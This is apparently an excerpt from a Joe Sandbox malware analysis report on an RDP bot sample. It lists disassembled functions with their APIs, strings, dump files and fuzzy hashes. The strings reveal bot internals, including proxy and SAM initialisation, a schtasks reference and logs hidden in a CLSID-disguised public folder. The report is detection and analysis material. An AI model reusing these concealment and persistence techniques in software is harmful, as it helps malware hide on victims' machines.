String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-4168131722
Opcode ID: e99d04283f27d490888ef91d9125258b00b88b98c993049e4454394497b2feb0
Instruction ID: 792cb8600e3f9ef0ee1e851e83c85ac80c44e5a1f1f8a8e820f58e0a8be84176
Opcode Fuzzy Hash: e99d04283f27d490888ef91d9125258b00b88b98c993049e4454394497b2feb0
Instruction Fuzzy Hash: 98415E62B0B64795FE118B40E8603B42361BF203E8F484136DA0D0ABA7DF3DE595E39C

Function 00007FFDA55AA57E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDA55AA593
LeaveCriticalSection.KERNEL32 ref: 00007FFDA55AA5F9
GetProcessHeap.KERNEL32 ref: 00007FFDA55AA630
HeapAlloc.KERNEL32 ref: 00007FFDA55AA644

Strings

[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFDA55AA6BC
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFDA55AA5AA
(handler != NULL), xrefs: 00007FFDA55AA5B1
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFDA55AA61B
mem_alloc, xrefs: 00007FFDA55AA684
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55AA68B
ebus_subscribe, xrefs: 00007FFDA55AA5B8, 00007FFDA55AA614, 00007FFDA55AA6B5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AA5BF

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: dc451bbeb70d10a428f1a1ddf5ef814284050e92ea7245ecc748ce65e9e4d9fa
Instruction ID: 25aebade8d73d8bb258c6ba580e05bd7425ce9c24c5b7bc7b550f196ef0f2184
Opcode Fuzzy Hash: dc451bbeb70d10a428f1a1ddf5ef814284050e92ea7245ecc748ce65e9e4d9fa
Instruction Fuzzy Hash: 37310A68F0B54F91FE528F04E8783B92261AF46F44F498835DA4D073E2EE2EE9458348

Function 00007FFDA55D15BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDA55D15D3
LeaveCriticalSection.KERNEL32 ref: 00007FFDA55D1639
GetProcessHeap.KERNEL32 ref: 00007FFDA55D1670
HeapAlloc.KERNEL32 ref: 00007FFDA55D1684

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55D15FF
(handler != NULL), xrefs: 00007FFDA55D15F1
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFDA55D15EA
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFDA55D165B
ebus_subscribe, xrefs: 00007FFDA55D15F8, 00007FFDA55D1654, 00007FFDA55D16F5
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55D16CB
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFDA55D16FC
mem_alloc, xrefs: 00007FFDA55D16C4

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: ef3b3ceb12a3f53667c2b6a81f336c770fc2ff4f160bc12307bb38e19f6219eb
Instruction ID: 3c3927183396117831832f7851149fd6721a7af436874a05ba1b25e37bfc447e
Opcode Fuzzy Hash: ef3b3ceb12a3f53667c2b6a81f336c770fc2ff4f160bc12307bb38e19f6219eb
Instruction Fuzzy Hash: 7031166BF0B64A85EA16DF41E8703742261AF46F84F4D8039C94D0B7A2EE2DF855C308

Function 00007FFDAC0F293E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDAC0F2953
LeaveCriticalSection.KERNEL32 ref: 00007FFDAC0F29B9
GetProcessHeap.KERNEL32 ref: 00007FFDAC0F29F0
HeapAlloc.KERNEL32 ref: 00007FFDAC0F2A04

Strings

[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFDAC0F29DB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC0F297F
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDAC0F2A4B
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFDAC0F296A
ebus_subscribe, xrefs: 00007FFDAC0F2978, 00007FFDAC0F29D4, 00007FFDAC0F2A75
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFDAC0F2A7C
mem_alloc, xrefs: 00007FFDAC0F2A44
(handler != NULL), xrefs: 00007FFDAC0F2971

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 70a6b400ab43d136f8bb913114e77ac07bbc09c39c42aef76914cb310b19e105
Instruction ID: 46befb385bf28571b5bb6932e15df5be3df4316b1568318a505b79ac33327f01
Opcode Fuzzy Hash: 70a6b400ab43d136f8bb913114e77ac07bbc09c39c42aef76914cb310b19e105
Instruction Fuzzy Hash: 0F311B62F0F60785FA129B05E8703B42261AF50BF4F588435C88D1B3A7EF2CE995938C

Function 00007FFDA55715BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDA55715D3
LeaveCriticalSection.KERNEL32 ref: 00007FFDA5571639
GetProcessHeap.KERNEL32 ref: 00007FFDA5571670
HeapAlloc.KERNEL32 ref: 00007FFDA5571684

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55715FF
(handler != NULL), xrefs: 00007FFDA55715F1
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55716CB
mem_alloc, xrefs: 00007FFDA55716C4
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFDA55715EA
ebus_subscribe, xrefs: 00007FFDA55715F8, 00007FFDA5571654, 00007FFDA55716F5
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFDA557165B
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFDA55716FC

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: ede822a38d14538cb8e364980b15d9585e003f99cc1bc3662abdc9f392ac9012
Instruction ID: 4d634feac9e88d12beaf7147f959d424e6827e66b59df6eedbaaef22520658e7
Opcode Fuzzy Hash: ede822a38d14538cb8e364980b15d9585e003f99cc1bc3662abdc9f392ac9012
Instruction Fuzzy Hash: 22310769F0F61BC1FA129F15E87037426A1AF42F94F984875C94D0B7A2EF2DF845A708

Function 00007FFDAC1262BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDAC1262D3
LeaveCriticalSection.KERNEL32 ref: 00007FFDAC126339
GetProcessHeap.KERNEL32 ref: 00007FFDAC126370
HeapAlloc.KERNEL32 ref: 00007FFDAC126384

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC1262FF
mem_alloc, xrefs: 00007FFDAC1263C4
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFDAC12635B
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFDAC1263FC
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFDAC1262EA
ebus_subscribe, xrefs: 00007FFDAC1262F8, 00007FFDAC126354, 00007FFDAC1263F5
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDAC1263CB
(handler != NULL), xrefs: 00007FFDAC1262F1

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 47b1dd69969509ee7c91f39f06bda4f9918e60f96952a5c634e839784ca5ac46
Instruction ID: d1ffc45c360566f2afd05f2e15f8a8ed1e189f421aa78b77c651d12e81b6a8ed
Opcode Fuzzy Hash: 47b1dd69969509ee7c91f39f06bda4f9918e60f96952a5c634e839784ca5ac46
Instruction Fuzzy Hash: E1311EABB1B90381FA539B05E8707792361BF94BE8F948435C84D0B3A6DE2CE8459349

Function 00007FFDA55AA076 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA55AA091
GetLastError.KERNEL32 ref: 00007FFDA55AA0D0

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

~, xrefs: 00007FFDA55AA14B
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55AA19D
P, xrefs: 00007FFDA55AA150
[I] (%s) -> %s, xrefs: 00007FFDA55AA0B7
, xrefs: 00007FFDA55AA0EE
proxy_init, xrefs: 00007FFDA55AA0B0, 00007FFDA55AA0DB, 00007FFDA55AA196
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu), xrefs: 00007FFDA55AA0E2
Done, xrefs: 00007FFDA55AA0A9

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
API String ID: 3179112426-3318474754
Opcode ID: 39f0e3e510b41dda994bd8df5e35c89b966b8dfeb2565fa66ec9c718540c44a6
Instruction ID: 6b0cc97b17603b494dd6a773438604211695b8923a83113a0a8d8ebbddfeb1f8
Opcode Fuzzy Hash: 39f0e3e510b41dda994bd8df5e35c89b966b8dfeb2565fa66ec9c718540c44a6
Instruction Fuzzy Hash: 3F31BA59F0E60FA1FB234F14D8E837926509B0BB55F910836C60E463D3AE5EE989924D

Function 00007FFDA5578F74 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA5578F85
GetLastError.KERNEL32 ref: 00007FFDA5578FC4

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

[I] (%s) -> %s, xrefs: 00007FFDA5578FAB
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu), xrefs: 00007FFDA5578FD6
Done, xrefs: 00007FFDA5578F9D
, xrefs: 00007FFDA5578FE2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA5579091
~, xrefs: 00007FFDA557903F
sam_init, xrefs: 00007FFDA5578FA4, 00007FFDA5578FCF, 00007FFDA557908A
P, xrefs: 00007FFDA5579044

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
API String ID: 3179112426-2019511216
Opcode ID: 2c0f77dabb96c33064383cb08453fddfb56d301a764a10c247504a0ccd6a76f7
Instruction ID: 015bc4d807474c2b2fbcb4922ee533b457db34b08ee2ff36b1e3b2bd1635e3c5
Opcode Fuzzy Hash: 2c0f77dabb96c33064383cb08453fddfb56d301a764a10c247504a0ccd6a76f7
Instruction Fuzzy Hash: 5B313C98B2F60F89FB225F1494F07B916B0AF47B04F500872D52E063939F5EB984D299

Function 00007FFDA55D9510 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 145stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDA55D95AA
strlen.MSVCRT ref: 00007FFDA55D95C6
strlen.MSVCRT ref: 00007FFDA55D95D7
strlen.MSVCRT ref: 00007FFDA55D9611
strlen.MSVCRT ref: 00007FFDA55D962D
strcpy.MSVCRT ref: 00007FFDA55D9649
strlen.MSVCRT ref: 00007FFDA55D9651
strlen.MSVCRT ref: 00007FFDA55D9660
strlen.MSVCRT ref: 00007FFDA55D9675

Strings

*, xrefs: 00007FFDA55D9656
schtasks, xrefs: 00007FFDA55D95DF

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: strlen$strcpy
String ID: *$schtasks
API String ID: 2790333442-2394224502
Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
Instruction ID: b76a8c1b71e5b140a6711715cb9db463777b72e59a8e7447f5f8aa4b09c5a1f3
Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
Instruction Fuzzy Hash: 8651B36BB0E6CBC6F763EE15A4703B956619B87B84F480031EA4E47397EE2DE8048704

Function 00007FFDA5BA378B Relevance: 16.6, APIs: 7, Strings: 4, Instructions: 104memorysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA5BA2ECA: recv.WS2_32 ref: 00007FFDA5BA2EF2

Sleep.KERNEL32 ref: 00007FFDA5BA37E3

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA3828
memcpy.MSVCRT ref: 00007FFDA5BA3844
GetProcessHeap.KERNEL32 ref: 00007FFDA5BA3866
HeapAlloc.KERNEL32 ref: 00007FFDA5BA3877
memcpy.MSVCRT ref: 00007FFDA5BA3898
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA38F0

Strings

mem_alloc, xrefs: 00007FFDA5BA37FE
routine_rx, xrefs: 00007FFDA5BA38D6
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5BA3805
[D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFDA5BA38DD

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
API String ID: 3537583691-1494920791
Opcode ID: 5af6970aa5c60453f790bbfafdf9fcc29e6d040ea408ef703b880acae55e1d2c
Instruction ID: be2078350c6026521e2bffae5d6a879f5c1a5f968e7b62405d58cf3147181be6
Opcode Fuzzy Hash: 5af6970aa5c60453f790bbfafdf9fcc29e6d040ea408ef703b880acae55e1d2c
Instruction Fuzzy Hash: 24418061B0AA0A97EA108F11F86437A63A0FB4AF86F544835EA4D43796DF7DE545C308

Function 00007FFDA55AC852 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFDA55AC8FE
fflush.MSVCRT ref: 00007FFDA55AC90A
EnterCriticalSection.KERNEL32 ref: 00007FFDA55AC923
LeaveCriticalSection.KERNEL32 ref: 00007FFDA55AC94B
CopyFileA.KERNEL32 ref: 00007FFDA55AC9A8

Strings

1, xrefs: 00007FFDA55AC992
kernel32, xrefs: 00007FFDA55AC854, 00007FFDA55AC855
., xrefs: 00007FFDA55AC98D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFDA55AC96B

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
API String ID: 513531256-1037688549
Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
Instruction ID: 0e9c5ba31d223de4a8bf454ad0d51a8de7a90cfb60e5e38056b66aaeae150568
Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
Instruction Fuzzy Hash: 6F418E69B0E68986F7229F10E8643BE2391FB86F84F410131DA4D437A7DF3DE6858748

Function 00007FF70CAD2EF2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FF70CAD2F9E
fflush.MSVCRT ref: 00007FF70CAD2FAA
EnterCriticalSection.KERNEL32(service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD2027,?,?,?,?,?,?,00007FF70CAD162F), ref: 00007FF70CAD2FC3
LeaveCriticalSection.KERNEL32(?,00007FF70CAE8500,00007FF70CAD2027,?,?,?,?,?,?,00007FF70CAD162F), ref: 00007FF70CAD2FEB
CopyFileA.KERNEL32 ref: 00007FF70CAD3048

Strings

1, xrefs: 00007FF70CAD3032
service, xrefs: 00007FF70CAD2EF5
., xrefs: 00007FF70CAD302D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF70CAD300B

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
API String ID: 513531256-4171087551
Opcode ID: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
Instruction ID: 26fb18c44d8d82619b04948370375e43d5250ce927e597d1979ee6d3ee0de867
Opcode Fuzzy Hash: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
Instruction Fuzzy Hash: 73417FA1A0864686F320BB18FC55BAAE360FF84784FC44135EA0E576D9CF3CE981C761

Function 00007FFDAC128480 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDAC12851E
strtol.MSVCRT ref: 00007FFDAC128534
_errno.MSVCRT ref: 00007FFDAC12853C
_errno.MSVCRT ref: 00007FFDAC128544

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC128504
(value != NULL), xrefs: 00007FFDAC1284F6
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDAC12856C
ini_get_uint16, xrefs: 00007FFDAC1284FD, 00007FFDAC128565
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC1284EF

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
